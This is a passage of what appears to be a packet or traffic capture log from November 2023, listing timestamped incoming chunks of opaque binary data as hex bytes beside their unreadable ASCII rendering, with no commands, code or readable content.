2023-11-18 09:02:40 UTC	6396	IN	Data Raw: f1 c2 7d 52 39 ef 13 d7 47 37 ab 5e a1 ff 15 26 ca d2 0f 2a 95 89 aa 7b 0d dc 0f 78 77 cb 0b de 65 eb ec 22 b6 66 58 fd 39 9a b4 06 56 6c 78 9b bd 55 7a d6 d8 35 ee e9 97 3c 03 47 9f 72 da c8 fe 7e b6 0b 90 6d 07 7b bb 62 4d 17 1e cf 0b af 79 ea 5e 19 cc b0 58 d3 e5 6d 96 4b 0e 50 4a 64 27 1d f6 14 b3 e6 13 ed 78 90 b5 ba cb 11 54 ca 8b 02 8a 5f 0e 43 1a 1f f6 97 4f 5e 70 33 89 b1 39 aa b4 86 6e f6 81 af fb ce 67 73 3f b5 f8 ec da 37 33 f3 d9 57 4f 66 e6 b3 7d 4f e2 aa 35 56 2b 30 47 05 69 74 bd d6 e2 73 ac aa be a1 cb 94 ab 96 bc b2 0b 5b 35 6d d1 d5 f6 64 d1 85 a2 4a af 3a 85 d7 7e 05 20 13 35 98 4a 62 cb ec 68 0a e9 c7 b1 91 96 f1 93 98 ec a5 42 21 e3 4e 89 9f 47 fe ea 49 a7 cd 48 38 28 4b b0 7d d6 fb f3 bb 40 87 68 35 b7 e0 d9 c4 91 8a 91 04 4d ed 61 Data Ascii: }R9G7^&*{xwe"fX9VlxUz5<Gr~m{bMy^XmKPJd'xT_CO^p39ngs?73WOf}O5V+0Gits[5mdJ:~ 5JbhB!NGIH8(K}@h5Ma
2023-11-18 09:02:40 UTC	6412	IN	Data Raw: 18 cc 5c d7 c1 00 c6 04 58 7d a0 4e ac 9e 2d 7d 6d c7 bc d5 af 4a 67 db d4 a3 5b 50 f6 97 78 38 65 ea 5e 97 4b 0e f3 15 cd a0 ac 84 8b ff 36 9b a1 6e 72 c9 98 d7 b9 e1 6b 98 de 53 f5 8c 29 a1 64 12 ca ca fa 99 b2 97 59 22 8d 97 c3 60 9b d7 b6 6e 5d 67 f5 11 e3 18 76 be 83 cc 15 03 e1 14 18 78 51 3e 5e 20 9a c5 d3 72 4e 8a ff e8 f1 1a fe 4d 55 8e f8 f9 d4 d8 6a 31 80 f8 33 0b 96 2d fd 99 f8 07 92 58 e3 c6 a4 d0 21 3d b7 04 51 f8 82 7e ee 9a ab 32 87 fe b0 9a ce b8 aa 33 86 d6 37 f1 de 10 82 3e 6e 0e b6 0e fc f7 be c2 32 86 e6 e1 19 cd 82 7a 43 dd d9 90 a6 e3 5e aa 5a 27 90 3b eb a4 1f 5a 10 9f 79 c2 e1 15 9e 17 09 d2 c2 c1 15 50 ee 9a 31 9f e4 75 5c 4f da 75 b8 9a db 84 8f d2 fb 5b 78 b3 b9 ac e2 21 85 5f 7c 61 fa 9c d0 f7 9d 63 fa b0 2e 6a f6 25 4e 6d 50 Data Ascii: \X}N-}mJg[Px8e^K6nrkS)dY"`n]gvxQ>^ rNMUj13-X!=Q~237>n2zC^Z';ZyP1u\Ou[x!_\|ac.j%NmP
2023-11-18 09:02:40 UTC	6428	IN	Data Raw: a0 ee 9b bf 07 03 92 0b 1d c7 c8 84 96 0f 44 83 14 68 12 64 d1 cd 01 fb e5 c6 18 c4 ee f8 ac b0 4d 55 20 de f6 1e 56 7e 02 97 66 9e 1c de 94 79 25 9f 0f 92 ee b8 ad ca c5 40 a6 55 39 f9 28 7e bc 75 6d 7f 7b 0b 83 c0 8e 88 7b ba 86 64 ee 49 01 90 2e f5 24 10 0b dd 54 bc 25 53 b7 ff ed 51 b9 49 6c 47 96 cd 8b 3b 24 b7 82 4d 13 46 81 20 5b 99 23 61 a9 98 28 a9 c4 58 3a b4 52 c2 7a 6c b0 70 0d 8f b6 f2 90 78 17 f7 91 03 e5 9b f6 4b 2c 54 60 21 76 a9 6e 37 b5 d9 11 4b dd 85 12 e5 63 6c 4e bc 0c 05 ae 98 b5 03 21 5e 04 4c e3 1d 57 97 bf a8 58 5f 02 dc 54 5a 70 68 ef f4 52 91 e0 6b 98 44 87 96 a4 85 fb 90 23 d6 eb 37 24 53 bd b8 e7 db 46 1f 19 fb b0 2b 7b 91 47 9b c0 19 36 ab 15 ac 82 99 5d 8a ed c2 2e ec 8e d7 8d f5 82 4a f7 f4 e9 be 17 1b fb bc dc 88 10 d8 54 Data Ascii: DhdMU V~fy%@U9(~um{{dI.$T%SQIlG;$MF [#a(X:RzlpxK,T`!vn7KclN!^LWX_TZphRkD#7$SF+{G6].JT
2023-11-18 09:02:40 UTC	6436	IN	Data Raw: 5e 6b 46 ff 8c d9 5c 2b 41 c0 7d 7f 97 6b 92 63 ce 72 24 73 6b 56 36 7c 83 79 ad bd fc 0b 90 5d 9b 9b 5e 47 c9 05 a1 e7 40 b9 85 bc 49 59 ff 6c 14 29 36 55 15 4c fe 64 03 e2 0f 29 42 33 d3 ed 41 9e 40 ee d3 8a 11 8d 86 fa 56 b0 34 a8 5a c5 b0 9b 6a 1d fe fa 08 02 7a 8a 04 79 dc a2 fe de e4 16 c7 c4 3c ba 57 20 17 40 19 06 60 a6 18 39 1a 04 bd 8b 81 af 61 02 5c 9d e7 c6 85 ee 08 83 60 de b5 dc 37 23 33 10 c9 96 36 56 60 19 f6 d3 da 6e 9c 05 05 d3 eb 83 ab 0e b3 b7 50 ef 09 bd e9 12 41 6c 51 b5 af 14 1b b1 bd 4d 31 d4 f2 b9 0c da 39 f0 fa 6c aa 2f 22 d2 21 12 53 03 c7 6f 37 c9 fa 1b f1 b3 fc 1e b9 94 95 d6 52 ed 97 82 e8 d6 6d 07 60 c2 0a 39 00 97 f7 12 15 1d 05 d4 2e 50 ac 20 84 89 a7 1e 3d 5c f8 50 42 5b b9 44 23 6f 41 b7 1a 69 f0 7c 94 7b 43 ea 39 0f fb Data Ascii: ^kF\+A}kcr$skV6\|y]^G@IYl)6ULd)B3A@V4Zjzy<W @`9a\`7#36V`nPAlQM19l/"!So7Rm`9.P =\PB[D#oAi\|{C9
2023-11-18 09:02:40 UTC	6452	IN	Data Raw: 9f 5a a8 aa b8 11 1d 45 28 ac 86 09 37 e9 1f ef b4 e0 6f 75 ad e5 d8 25 06 19 b4 a8 07 78 79 43 63 40 26 bd 28 50 2d 29 26 f9 fc 5c 71 8f fd 62 12 7c d0 67 b3 65 ef 31 c0 99 c1 54 fc 32 6e 25 56 77 6e c1 6b 11 50 7c a1 0b 97 8a fe 0f 5b 16 93 83 e0 d8 b7 bf a8 90 6d d6 8b 4b d9 17 bb e8 d9 bb 5f 39 4a 33 7c b3 12 99 1e fc b2 05 91 67 df 8d 0b 55 fb d1 8d 0c 9b 80 81 ee 8c 05 e2 16 30 ad 1f 88 04 75 c1 e5 ec 32 f8 a0 5b 21 f6 d8 13 26 e4 a1 32 a8 93 91 5d 33 45 83 72 52 59 23 84 f6 7b e2 90 20 c6 40 33 a9 94 cd b9 ab e4 44 0b 06 bb 4c 2c 2a 5e 4d 57 b7 e0 b8 86 74 ab ea 37 1c a0 a6 21 33 c7 f5 24 7d 14 c8 8b 9d 8f 31 23 29 9d 11 42 07 e8 2c ec 7d 70 8d b5 a4 ca 33 30 03 75 17 a1 10 e7 6b 87 f9 0b ef 43 ef f8 24 c2 f1 7a 1a 70 7e 2f d4 eb 97 40 a6 e6 2d c1 Data Ascii: ZE(7ou%xyCc@&(P-)&\qb\|ge1T2n%VwnkP\|[mK_9J3\|gU0u2[!&2]3ErRY#{ @3DL,*^MWt7!3$}1#)B,}p30ukC$zp~/@-
2023-11-18 09:02:40 UTC	6468	IN	Data Raw: c5 77 f4 96 56 51 8b 7c 7e e5 23 5d 46 1b 2e 28 c0 80 6b 6a 85 6c cf aa 28 f3 83 2d 42 6f f3 5e 5d a2 7b ba 5c 12 b0 da a0 eb df ad 1d 4c 54 cf ad 02 68 cd fe 5c 5b 65 6d a5 cc d3 ed 32 74 6c 58 83 3a c1 71 bf b5 a2 bd 10 e5 46 c5 00 82 b1 eb 6f 73 f9 12 23 e4 da ff a3 c4 9c f1 cc 0e 1a 7a 10 62 8f a5 b2 35 51 67 b5 95 be 4c 81 53 fc dd 27 26 97 42 01 ec 08 91 b8 f0 af 57 54 73 52 8f de ca ed 1b ca 8d 97 1e dc e7 fa 68 af 37 b0 62 a3 9f bc ac 9f 28 1e b7 aa b0 91 e4 95 ad f9 e5 d4 cc 23 0f 4a 2d dd ea 64 d1 04 3c d0 ca fe d3 19 9d 28 a5 1c ff 3e ae e9 fb 12 03 6d cf bc 5f 27 ce 1a b9 c0 31 88 6e 2e af 35 5f f0 ce 92 f8 6f d6 67 1c c6 5c ee 59 aa d6 8c a8 13 e6 f7 e2 82 2f 82 1e 4c 0d ab 3e db 4d c5 90 32 e4 f0 74 c1 92 1b dd f3 a7 f6 6b 01 9d 8d 78 3d 5a Data Ascii: wVQ\|~#]F.(kjl(-Bo^]{\LTh\[em2tlX:qFos#zb5QgLS'&BWTsRh7b(#J-d<(>m_'1n.5_og\Y/L>M2tkx=Z
2023-11-18 09:02:40 UTC	6484	IN	Data Raw: a6 3b 8d 79 58 92 d9 da 82 34 a7 99 bc 43 a3 0a 7e 85 0b ab 0e c2 94 22 2d 05 99 9d 5c c7 b2 7b 18 3e b2 dd 47 b3 d7 cf 19 c7 55 5e 64 d8 7b b4 f6 11 72 ed bd fc d8 e9 9f cd 9a eb b2 6c 04 b9 88 f7 60 68 c3 f2 fd a0 8c 82 c5 f7 5d c3 9a 1e 49 27 69 35 b0 8f e9 b3 e4 09 d8 1a 73 9e 56 41 fa e0 94 9e 0e 65 e6 5b e2 12 39 ca 86 0c ae ee 24 58 fd 85 09 7a ad 54 de da 06 73 7d 11 7e 91 44 f3 4b 61 ce 8a ff 76 92 2e 43 52 cf 63 3f c4 1f 7f 4d 67 21 ed d7 88 db 36 56 11 b2 3b ee 5f 2d 5f 17 98 a1 d5 cc 82 fd c2 56 69 aa 68 86 af 48 77 ba e9 d9 42 cd aa e3 ad 2b 17 ef d3 54 c5 4e 31 0b 14 b7 73 c1 6f c3 06 41 1a 11 19 9f e9 9f 61 4f 13 9b 3e cd 7c d6 2a b3 87 84 58 58 10 1f a0 2e 5c 15 8b 5e 37 d4 22 93 d9 67 e1 a8 35 e2 95 d8 4c 2c 65 c9 21 af f9 dd 3d 2c 0e 0c Data Ascii: ;yX4C~"-\{>GU^d{rl`h]I'i5sVAe[9$XzTs}~DKav.CRc?Mg!6V;_-_VihHwB+TN1soAaO>\|*XX.\^7"g5L,e!=,
2023-11-18 09:02:40 UTC	6500	IN	Data Raw: 91 66 c7 93 3a 0a 72 b1 ed 36 9d de 21 dd 7d 0a 7b 35 1f c3 56 de bb cb b2 0a b6 84 ce a1 c6 1a 46 2f 9f 48 d5 98 73 a4 bd bd a3 e9 c9 c4 64 89 b7 9c 97 7c 2f 88 22 e4 4b 71 3d 2a 47 ee f8 fe e0 f7 03 14 e6 7c 9e 57 bb 8e f5 ea 63 fc 5b 18 3b a2 a1 4a 28 82 37 77 5b c4 d3 c1 f2 87 13 2b 2a c8 ac 70 e1 82 38 9c 12 a0 c4 9e 6b ac 33 8a e9 31 6f a1 76 94 48 cf bc 78 22 82 6a b0 b9 49 71 db de 8b 90 09 82 4d 79 17 e8 cf d8 50 c3 08 07 81 5f 9a 72 ce 0a e4 29 c9 dd 95 67 58 a1 14 ec cf 2f 29 cf ce b3 35 54 77 67 56 ec 95 68 ee bf 9c 9f 74 78 12 d5 30 83 28 d5 36 96 57 a0 8d 1c 99 19 04 af 25 e5 71 83 88 b0 74 38 dd 8a ff 39 7a fd 34 8f 9c 67 a8 c8 6f 13 5d f2 5b 22 d3 8e 63 51 58 9b fc aa 89 65 4e 36 c4 a7 ef 98 f9 af cd 35 8c 16 bc 70 4f cd 71 2a f4 13 b3 3d Data Ascii: f:r6!}{5VF/Hsd\|/"Kq=G\|Wc[;J(7w[+p8k31ovHx"jIqMyP_r)gX/)5TwgVhtx0(6W%qt89z4go]["cQXeN65pOq*=
2023-11-18 09:02:40 UTC	6508	IN	Data Raw: 5c ee 18 88 61 e4 54 6b a2 e8 7f f0 15 c3 ce bc 5b 91 25 7b 1d d3 9f 13 1b 01 5d 43 e8 a1 77 5a 87 79 8b d5 69 f7 df 66 a2 84 0c 66 ac 15 65 bf 74 c0 d2 78 6a 3a 9c 98 62 04 41 95 b2 23 59 c6 b0 c5 22 c0 fa aa c8 94 73 91 5b 64 1b 74 be cb a1 81 b1 c1 26 a1 94 55 04 b3 9c 80 b7 00 6f 36 c7 7f 6d 97 ea f3 f5 55 c5 fe 61 d9 b1 6d 8c a1 02 08 b3 41 e6 e6 57 c6 ff 6e 47 a4 22 2e 2d 21 53 be e3 be 15 ec 23 9d 87 e0 2e cc 6c d0 c7 b7 3d a4 07 5f 69 4e 2b 07 69 4f c5 a3 66 52 91 8f a4 48 b9 40 76 d9 cb 6e 1a 35 9e 50 9f d1 78 b2 b8 0d a8 f8 6e 07 a5 3a df 3c 32 a6 10 bd 73 2f 07 45 66 0f 61 ce c2 08 19 98 33 4b 59 81 b5 78 4f 46 88 ae 29 f8 f5 c2 29 6f 8f e5 8f b0 53 c8 7a 48 da 6f 7e 8a 69 68 ab ba d9 20 0f 96 69 41 a6 92 94 8e 0f 86 df 8d 70 af fe f1 20 50 01 Data Ascii: \aTk[%{]CwZyiffetxj:bA#Y"s[dt&Uo6mUamAWnG".-!S#.l=_iN+iOfRH@vn5Pxn:<2s/Efa3KYxOF))oSzHo~ih iAp P
2023-11-18 09:02:40 UTC	6524	IN	Data Raw: b1 0d fa 12 1f be 59 4f f7 c8 5b ab d7 16 3d 7e 97 9e ec f8 cb 31 2e e0 41 0b 00 a6 6d e9 5e d5 4a c5 bf 1c cc a5 71 94 29 3d 17 43 27 63 c4 c7 8f 1b b7 5f cf df 8e 6a 69 87 c1 29 ab 7b 8d df 07 95 50 a3 1c 8e dc 7f 8a 21 37 1e 26 a7 67 28 b2 c8 23 5a 1d 94 46 1b 3e 72 87 73 08 e2 3b 46 51 be 5b a9 72 b9 f8 45 6d 0c 89 80 0d 7a fb 4c 3f 7f 3d 29 ff ef b2 ec 23 c2 26 cf 8c 2e 28 bf c5 68 47 d9 49 95 f1 67 7e 3a 48 e2 43 5c c8 95 5b b2 f3 22 c9 73 91 b5 78 96 1b 9a 75 5f b2 6b 8c 66 8c 8e c1 e1 de d6 64 31 e1 7b 12 d2 85 8f 52 68 ec 80 26 3d cc 9b e3 57 be 19 42 b9 dd 7d 2b 5b 6d 1b 9e 96 d7 75 83 82 3c 3e 5f f8 a9 36 be 14 c7 ce 9d 05 7e d7 38 37 35 c9 37 8b 9f c6 2d ff 00 41 ff 1b 09 ea d2 b0 04 48 ff fc b5 67 54 39 3d 23 68 0b 7d 97 f3 65 20 a2 f8 33 96 Data Ascii: YO[=~1.Am^Jq)=C'c_ji){P!7&g(#ZF>rs;FQ[rEmzL?=)#&.(hGIg~:HC\["sxu_kfd1{Rh&=WB}+[mu<>_6~8757-AHgT9=#h}e 3
2023-11-18 09:02:40 UTC	6540	IN	Data Raw: 06 e6 00 b7 2b 22 d9 8b 97 5f 54 5e b4 7b f0 75 dc b0 24 34 1d 2f 42 7c 34 13 28 b0 fc c9 d2 ba 3b 60 fb 99 b9 cb 36 44 8d a5 89 0b 92 9f fa 54 de a8 78 56 92 ba a6 f4 59 e5 f6 09 da 46 0c 0b c9 08 c5 60 26 ef 8d 6f c1 1d bf 7b e9 42 fe d3 63 b5 df d1 0b 97 f6 30 af 71 73 db a3 9a 7a 68 67 ff 23 b5 b4 ea fe ee ec 06 67 af 1d ef 6e fe e6 b8 d0 9d f3 fb ac 60 90 44 18 e7 62 c1 f1 98 f8 6b 0c a5 69 85 dd fb d8 ef e0 d2 bc 57 e5 82 ff 52 c6 5a c3 63 38 62 25 33 b1 47 7b 21 b0 41 f9 b2 88 d8 83 4d a7 ce 85 57 e4 0f f6 76 6c e3 29 ce 3c ad af 24 f0 ac ff 54 99 7a c9 76 de 0f 7a 33 47 02 46 12 6d d4 89 21 c9 cf df d7 89 2c ef 44 bf b2 e1 bf 69 7f 82 e5 ea 95 c4 27 d5 c4 f2 8d 4c cf b6 fb fb 3d 38 dc 59 d3 34 e5 52 76 38 62 a1 fd c0 f9 1a e3 68 fe ae f9 93 fa 27 Data Ascii: +"_T^{u$4/B\|4(;`6DTxVYF`&o{Bc0qszhg#gn`DbkiWRZc8b%3G{!AMWvl)<$Tzvz3GFm!,Di'L=8Y4Rv8bh'
2023-11-18 09:02:40 UTC	6556	IN	Data Raw: 7a 02 16 a6 01 e6 09 6a a6 15 0d 89 73 02 16 a2 9d 5e 1b e6 58 cc 5f 3a 39 01 0b f4 0d d1 42 ab 0d 56 92 ac 8b 13 bb ac c8 82 3a 62 95 28 7a 00 0a 3c 01 8b d1 80 68 a0 d5 08 ab 4f d1 03 2c ee 89 6f a0 49 5a 77 42 2d 5a 21 b2 02 9d c0 bd 0a 01 80 b0 be 24 b2 a0 88 3a a0 a6 5d 76 f0 44 8a 42 e3 e8 ff fd 42 c2 9d d5 fe b7 74 48 13 67 20 fe 4f 00 ce 4e 93 d8 e8 85 a3 49 85 08 83 c8 70 02 66 f6 04 cc d2 09 88 09 44 8e ce 4a e5 71 58 1a e8 eb 30 54 a9 1c ba 05 31 73 ba 03 12 2f a4 18 5c 00 d5 12 a1 2a 10 6b 90 35 86 ee 2c 01 6c 1f 74 b7 0e c2 42 ac 9d fe cc 82 67 85 d0 55 e0 12 a0 7b e1 c6 ac 70 1d 24 0a e5 51 e8 6e 2b 84 86 98 3e fd 85 05 6f 0a a1 42 1a c1 35 80 8f c0 5c b9 e0 3a a8 c4 7b 10 6d 74 42 ea 3a dd 09 c1 21 e9 42 3a c0 35 80 f7 43 a6 fb df 1c 43 4e Data Ascii: zjs^X_:9BV:b(z<hO,oIZwB-Z!$:]vDBBtHg ONIpfDJqX0T1s/\*k5,ltBgU{p$Qn+>oB5\:{mtB:!B:5CCN
2023-11-18 09:02:40 UTC	6572	IN	Data Raw: 88 30 63 b4 44 d7 81 af 59 c1 fc 6e 24 00 cf 72 17 28 d0 54 cf 48 a4 19 3b 55 94 ae 2b 44 bb 24 e2 59 f0 8e b0 e8 4f f2 3e b7 d7 8f a7 fc d0 16 c6 0f 25 08 de 24 25 8f a0 2d fd 69 d1 fe 7d d2 d0 6f 6e 94 7e c9 d8 2f b8 32 1c 89 af c2 83 fc 52 12 0e 32 d9 c9 aa 7f 65 a8 1f 79 2c b8 a6 bf c6 30 76 d3 c3 94 5d 0a c6 91 d1 d5 fb f7 26 0a fe 46 34 5e 16 dc ff 9d 50 e9 e7 c6 14 b9 d3 bb 84 5c f4 c5 c2 a5 98 45 2f 45 d6 90 43 8b e3 f9 d9 8b 1e 4d 94 b8 16 08 63 6b f5 f7 35 f4 a1 fe 3e 84 4e 0b f5 93 7c df 03 57 5f a0 94 a5 80 6c ee 34 49 92 88 37 cf 46 f0 e6 b1 21 78 03 1b df 2e 02 88 e5 9c 9e 37 d5 2a 51 9d 42 a2 6e 38 ef 3d 74 27 2b 32 db d9 40 2d 81 f7 7d c7 d0 b0 f3 6a 9e 15 98 9a 64 ae e6 07 fa 08 e3 b3 c3 8f 03 a4 82 76 21 35 01 18 b1 2b 98 a1 3d 0b 74 ad Data Ascii: 0cDYn$r(TH;U+D$YO>%$%-i}on~/2R2ey,0v]&F4^P\E/ECMck5>N\|W_l4I7F!x.7*QBn8=t'+2@-}jdv!5+=t
2023-11-18 09:02:40 UTC	6588	IN	Data Raw: 36 10 0b 98 89 04 3f 10 71 c9 85 2d ea 6e 2b 8f ee b6 92 3b 6c 82 20 fd d1 dc cd 76 b4 4d 27 57 8a ae be 1d 7d 78 71 58 3b ae 07 ce 03 75 dc e8 3e 6a 7b 67 f3 e0 f5 c5 a2 79 f0 1d d5 0f 18 93 62 9a 04 35 98 07 6f 3b 89 f3 a7 b2 6a 5e bb 60 3f d4 e3 f8 3f 35 5f c4 3a e5 50 67 3a e5 5e 3a 6f 3a 9b 2f 53 8c e6 0b 26 8d 32 98 2f 6d dd 6c f7 8b e7 cb 55 b4 fb 57 bc 1f 56 ff 64 92 2c 4f ba bd 77 79 57 f4 cf 98 f7 45 f3 e6 a0 e1 bc 59 a0 9f 37 5e 32 2f e1 7c 42 7c 3a 8e a9 ea a0 40 19 f9 b8 c5 c4 fc 0e 35 fe 27 ba 93 72 eb 79 c8 4a e6 3a c2 4e ca f7 b1 03 cd 6c f5 07 55 29 25 ca 96 e0 a3 ef 39 a4 ca 72 39 9e 1e 9e 93 e8 87 46 6b 43 69 87 3e a0 f1 1f 70 d2 8e 37 45 b1 ca e3 ce db d0 29 0e e8 0f f6 c8 ca 6d b5 91 2c b4 3d 3d fd d0 29 ab 16 02 86 e2 c0 a9 ab c3 5f Data Ascii: 6?q-n+;l vM'W}xqX;u>j{gyb5o;j^`??5_:Pg:^:o:/S&2/mlUWVd,OwyWEY7^2/\|B\|:@5'ryJ:NlU)%9r9FkCi>p7E)m,==)_
2023-11-18 09:02:40 UTC	6604	IN	Data Raw: ca 0b 28 e4 2a 94 6f 88 07 21 ae a9 ce 36 03 f7 f2 18 f7 d8 83 54 f9 11 10 74 09 e3 5f 70 41 7c 87 37 eb 78 d2 a5 4d c9 10 da bf ca cc 16 05 5b 1e 9b f3 87 f7 42 9a cf 79 7e f6 87 ff 21 3d af 35 79 59 48 fe cc 31 11 1e 58 a0 3c 36 12 e3 63 8a 21 ff ec b6 dc 39 fe b0 c1 1e 2a c0 f0 a9 ba 9d a5 a4 89 66 48 09 85 c5 14 f3 b5 a2 9b f1 6c 76 c3 18 15 3b 8b c5 02 ca 3c 80 0a 04 8c 32 9f c7 3f 6f d2 46 39 1b 3c 83 78 3f 8f 32 78 17 1d 9d 9f 61 c7 85 50 72 af 3a de d8 53 bf 59 ce 67 a3 90 ff 93 6e 7f 30 70 9f d5 fb 65 77 66 d0 df 9c b9 c3 7c c0 fb 8f 6e ef 65 36 12 03 22 38 12 0e f6 3c a6 41 1e 9a ec 1f 6a 86 34 7e 87 17 9d 03 eb 49 e8 eb 5e 9d 3f 62 5c 2a ac 8c 78 3b f7 db ba 9d 7b eb 2c 46 c8 9b fc b8 55 a3 cc df 49 f4 7d 04 24 cf 53 cf 91 28 34 42 65 70 67 db Data Ascii: (o!6Tt_pA\|7xM[By~!=5yYH1X<6c!9fHlv;<2?oF9<x?2xaPr:SYgn0pewf\|ne6"8<Aj4~I^?b\*x;{,FUI}$S(4Bepg
2023-11-18 09:02:40 UTC	6620	IN	Data Raw: 3d bb 27 46 cf 1e d8 1b 00 17 31 55 b2 0b f7 6f 03 38 b1 f4 2b 64 c3 7a c2 72 5c 5c 5f 6d 69 14 57 d5 18 8f 8a ce 8f 18 2a b2 01 dc 52 c3 24 98 b5 d5 4e 36 b6 7b 79 80 65 08 dd e6 4d a3 fc f8 d8 c7 7f 8a 18 12 f7 fc 60 ef 53 c9 17 5d 27 17 dc 0e 3d a9 c4 ab cd d5 90 59 78 73 a7 93 95 23 55 e8 e6 0a 16 9b e5 05 26 6a f5 1d e1 f6 c1 94 24 84 f5 76 63 bf 56 ba b3 53 0d 76 1a 1e 35 c4 e1 9c 0a 93 ce b7 3f 2c c7 66 f0 2e a6 f1 e3 a7 ee 39 15 26 1a 9c 89 26 aa 25 bd e9 00 35 c9 38 91 c7 94 c3 2e 8c 33 ff 04 eb f3 8d 7d fe 60 e5 c3 68 bf b0 9b 7b c1 e6 b1 1e 5e 60 80 8a 83 3e a5 64 76 67 cb 30 81 a1 6d f0 08 fb f0 08 85 8c 4e 50 3a 29 0f f5 62 9b c1 18 f6 5a 77 29 1e 3b f7 a6 48 fd ea 0b 3c 9f 3d 29 40 84 40 cc f7 fb 78 20 48 fb 41 5a 55 ad a3 5c 47 7f c9 17 dd Data Ascii: ='F1Uo8+dzr\\_miW*R$N6{yeM`S]'=Yxs#U&j$vcVSv5?,f.9&&%58.3}`h{^`>dvg0mNP:)bZw);H<=)@@x HAZU\G
2023-11-18 09:02:40 UTC	6636	IN	Data Raw: 52 a2 fd 26 11 d2 17 6e 25 a4 9f 25 02 71 50 63 2e ad 6c 8e fa 3f af 22 f7 04 70 f7 46 7b f3 13 18 5e a6 2b 96 12 ab 50 9f 3a 83 dc b2 03 6b 18 9a bc 9f e9 53 27 a0 cf 7b 1d 8c 51 f4 3a b9 09 f0 ca 99 23 fa ca b3 be 57 e5 61 bb 9b 10 6d b8 39 64 e0 71 84 35 69 8c 59 9b 12 3a ef a0 31 c6 03 ba c9 9d 39 a5 cf ee 1d f0 7e 86 fa 23 af 31 f2 e9 1f 2c 51 8f 6d dd 90 27 6f 97 7e f7 93 f8 96 f3 20 b7 43 c5 39 4f 5d 3b 1c e1 31 b2 77 d5 39 c0 59 f9 01 56 ab ef 37 1b 11 49 26 bf 5f f2 bd f7 e8 6b eb c9 63 5a dd 05 0d f2 a0 db cf 28 c9 4e ef e3 f2 b9 74 0a 27 76 8e 49 fa 2c 95 f5 3f e9 4c fa cc 85 f3 c7 de 09 b2 83 81 44 ff 66 d9 3e 52 10 55 b8 db 12 21 3d 5a 43 22 3e d0 1f fa 35 91 fd 43 ee c9 dc 18 c0 b5 ed 8d c0 bc 30 09 4c eb ca 61 6e 8c bb 89 56 5f 94 de 6f 89 Data Ascii: R&n%%qPc.l?"pF{^+P:kS'{Q:#Wam9dq5iY:19~#1,Qm'o~ C9O];1w9YV7I&_kcZ(Nt'vI,?LDf>RU!=ZC">5C0LanV_o
2023-11-18 09:02:40 UTC	6652	IN	Data Raw: 95 cd 75 27 ee 50 27 e8 49 e9 a8 1a 0d 39 b2 d9 54 63 ed 6a 72 d0 d1 6d c8 8f 7c 7f d3 b2 22 bd 34 7a 7d 10 3d dc 07 b3 93 57 7b 51 be 95 3d 8b 1f 86 f5 e3 b9 6b 38 8e 19 c3 f0 9c 03 cf 89 4c a3 ce db 71 0d f9 c9 41 34 b0 23 62 41 74 4f a4 1a dd 3a ad 84 35 b5 48 2f 81 bf 0d 46 00 3f 7d 11 08 ad 85 14 73 03 d8 aa be 28 4f 5f 81 be 72 f3 c8 f6 7d 51 8e be 22 17 de 72 c8 f6 08 64 db 45 2e 0c 2c 85 1e 0b f4 15 48 ae ed 28 b7 70 db 1f a2 d5 bb ee c5 09 e1 37 cb 67 e6 78 8c 47 1e e6 78 b9 53 e0 e5 bb 26 bc 94 3e 80 9a 9d df 7c 6f d6 f5 ce a8 ef ee 18 e3 bb a1 fb 09 9f cc 98 7f a3 e8 9b f0 21 68 3f f2 f0 68 fa f6 a7 d9 bc f0 05 29 39 f8 75 17 f2 cb f2 e3 d9 c6 75 70 fb 42 43 49 c3 91 b8 f8 6b 66 7d 57 cc 97 0a 53 0e 68 5a 11 f9 1f 2c a3 f9 72 2d ce 17 8a 60 e1 Data Ascii: u'P'I9Tcjrm\|"4z}=W{Q=k8LqA4#bAtO:5H/F?}s(O_r}Q"rdE.,H(p7gxGxS&>\|o!h?h)9uupBCIkf}WShZ,r-`
2023-11-18 09:02:40 UTC	6668	IN	Data Raw: 26 52 81 60 4f 06 1a 3e dd a9 8e 00 59 5e 2a 52 81 5c 4f 06 0a 3e 3d 5b 1d 01 d5 b1 4e a4 02 b1 9e 0c c4 7a fa b8 d8 95 23 29 e1 42 d7 2f f0 76 72 09 15 49 bc 4b 6f e6 e2 a9 b2 36 6e a1 75 bf 68 03 5d d8 04 18 09 8f 30 94 ea 47 8a e2 ef a3 ed 47 ee 07 a0 a9 e0 34 9e 26 4b c3 62 90 eb d0 71 c5 af 5f a7 5d 23 8c 10 51 17 6e 28 97 25 d4 6a f2 c3 f5 72 79 0f 0a 18 b3 ca 9b 68 4f c0 33 0b a4 0c c7 b6 f0 75 71 3c 79 f9 29 00 28 11 2f b9 fb f0 a4 ee 90 a3 8b ee ec 7f 95 ae f0 eb 76 6f 96 b0 f5 59 a1 d7 c8 dc b9 00 da fa 7c 43 af b1 73 0f 03 ea a0 dc d2 00 72 7c 49 1d 4a e3 d8 ba d4 8b eb 4b c2 55 7d 30 ea 2b 57 20 6d 43 c3 2c d0 07 16 f4 a1 12 50 47 4a 40 1d 29 01 75 f8 e5 a2 84 b8 40 74 11 af a4 b2 03 22 f0 d7 6f f0 d6 7c 11 f7 04 b0 73 d5 e3 20 6f b8 a4 22 77 Data Ascii: &R`O>Y^*R\O>=[Nz#)B/vrIKo6nuh]0GG4&Kbq_]#Qn(%jryhO3uq<y)(/voY\|Csr\|IJKU}0+W mC,PGJ@)u@t"o\|s o"w
2023-11-18 09:02:40 UTC	6684	IN	Data Raw: 9c 7f 42 d2 79 ea 66 49 e9 70 4e 47 3f 27 1b a5 e2 eb e2 6a 54 d2 ae 89 ab 1f 28 2d ef 21 6b 42 0c af 0d 80 b2 13 ae ee c3 00 d1 28 f5 ab ef e1 7d e1 c5 e1 eb 5d ec 18 39 00 6d f0 e4 48 e8 0f c3 9d e4 b3 4d 02 81 22 4e ec 32 f5 8c 72 77 40 77 4e 2b a9 9d 6a 61 ce e9 e1 1a 59 1d 50 ee 2e d5 6b a7 c9 90 24 b3 da e9 72 b8 c6 8e 69 79 90 66 87 34 98 66 d3 ed e1 1a 27 a6 39 f1 be 03 a4 81 8e 33 dd c9 d9 b0 f7 f0 ec a0 c7 dd f2 28 da 0a 49 18 b2 ea 18 85 6d 3e a2 b4 77 52 58 af d0 55 c2 a7 bc 88 ae 68 34 04 af 31 85 9d d3 29 e4 43 ad c7 03 0d c1 ef a4 77 a4 43 30 a2 39 04 5d 86 c1 2f f2 a4 9d 8c eb 13 b9 90 e8 96 76 96 73 70 2e 7a f1 ba a4 1c 9d 6f 48 03 6c 3f 6e 7c 5d e2 d8 8f 5e 3d c3 ee e9 18 1e b1 81 7b 03 43 d7 58 9e 5c c7 ee 19 3b 91 5c fd 34 c2 